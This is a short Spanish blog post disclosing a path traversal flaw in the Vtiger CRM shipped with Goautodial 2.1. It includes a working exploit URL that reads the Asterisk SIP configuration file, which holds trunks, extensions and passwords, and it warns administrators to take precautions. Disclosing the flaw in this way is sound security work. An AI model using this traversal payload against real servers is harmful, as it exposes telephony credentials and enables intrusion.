Como saben este famoso software de marcación predictiva, trae Vtiger como software para CRM, por defecto, ultimamente estoy trabajando mucho con este software, así que, como siempre no esta demás probar, como dirían los colegas «las fijas».
A través de Vtiger, es posible explotar una vulnerabilidad que permite visualizar los archivos locales del servidor goautodial, mediante la manipulación de URL , esto sucede en Goautodial 2.1 , aquí algunos ejemplos.
1.- Detectando Vtiger en Goautodial 2.1
2.- Explotando la vulnerabilidad , visualizando el archivo de troncales, extensiones y contraseñas
URL : http://IP/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/sip-vicidial.conf%00
Si bien es cierto, esta es una vulnerabilidad ya reportada en vtiger (http://osvdb.org/show/osvdb/80552) , al parecer la gente de Goautodial aun no corrige la versión.
Bueno espero les sirva la información y a tomar sus recaudos
UPDATE 20/03/2014
Hace poco me hicieron una entrevista en donde, me filmaron haciendo una demostración de esta vulnerabilidad , a continuación les comparto el vídeo:
Deja un comentario